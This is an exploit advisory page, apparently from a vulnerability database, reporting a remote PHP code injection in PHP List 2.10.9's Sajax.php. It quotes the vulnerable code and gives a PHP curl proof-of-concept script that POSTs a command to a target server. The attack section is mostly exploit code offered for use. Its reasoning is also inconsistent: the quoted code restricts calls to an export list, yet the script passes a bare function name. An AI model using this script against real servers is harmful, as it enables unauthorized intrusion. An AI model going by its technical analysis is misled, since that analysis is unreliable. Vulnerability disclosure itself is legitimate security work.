PHP List 2.10.9 PHP Code Injection

2012.05.28
Credit: L3b-r1'z
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-94

# --------------------------------------- # # Author : L3b-r1'z # Title : Php List 2.10.9 Remote PHP Code Injection # Date : 5/25/2012 # Email : L3br1z@Gmail.com # Site : Sec4Ever.com & Exploit4arab.com # --------------------------------------- # # This PoC was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # --------------------------------------- # # 1) Bug # 2) PoC # --------------------------------------- # # 2) Bug : # An attacker might execute arbitrary PHP code with this vulnerability. # User tainted data is embedded into a function that compiles # PHP code on the run and #executes it thus allowing an attacker to inject own PHP code that will be # executed. This vulnerability can lead to full server compromise. # Look To The File Named (Sajax.php) In Dir (admin/commonlib/lib) On Line (63) # 63. $func_name = $_POST["rs"]; # if (! empty($_POST["rsargs"])) # $args = $_POST["rsargs"]; # else # $args = array(); # } # # if (! in_array($func_name, $sajax_export_list)) # echo "-:$func_name not callable"; # else { # echo "+:"; # 74. $result = call_user_func_array($func_name, $args); # echo $result; # } # exit; # } # So We Have Variable Func Name With Post rs :) # In Above Of Code We Have $_GET['rs']; So This Is An Attacker Wan't It. # Look To Line (74). # Call_User_Func_Array($func_name, $args); # Attacker Can Inject In Get Paramater Or POST PHP Code. # --------------------------------------- # # 3) PoC : # <?php # $target = $argv[1]; # $ch = curl_init(); # curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); # curl_setopt($ch, CURLOPT_URL, "http://$target/Sajax.php"); # curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); # curl_setopt($ch, CURLOPT_POST, 1); # curl_setopt($ch, CURLOPT_POSTFIELDS, "rs=whoami"); # curl_setopt($ch, CURLOPT_TIMEOUT, 3); # curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); # curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); # curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); # $buf = curl_exec ($ch); # curl_close($ch); # unset($ch); # echo $buf; # ?> # --------------------------------------- # # Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The Injector , Over-X , Ked-Ans. # --------------------------------------- #

References:

http://Sec4Ever.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top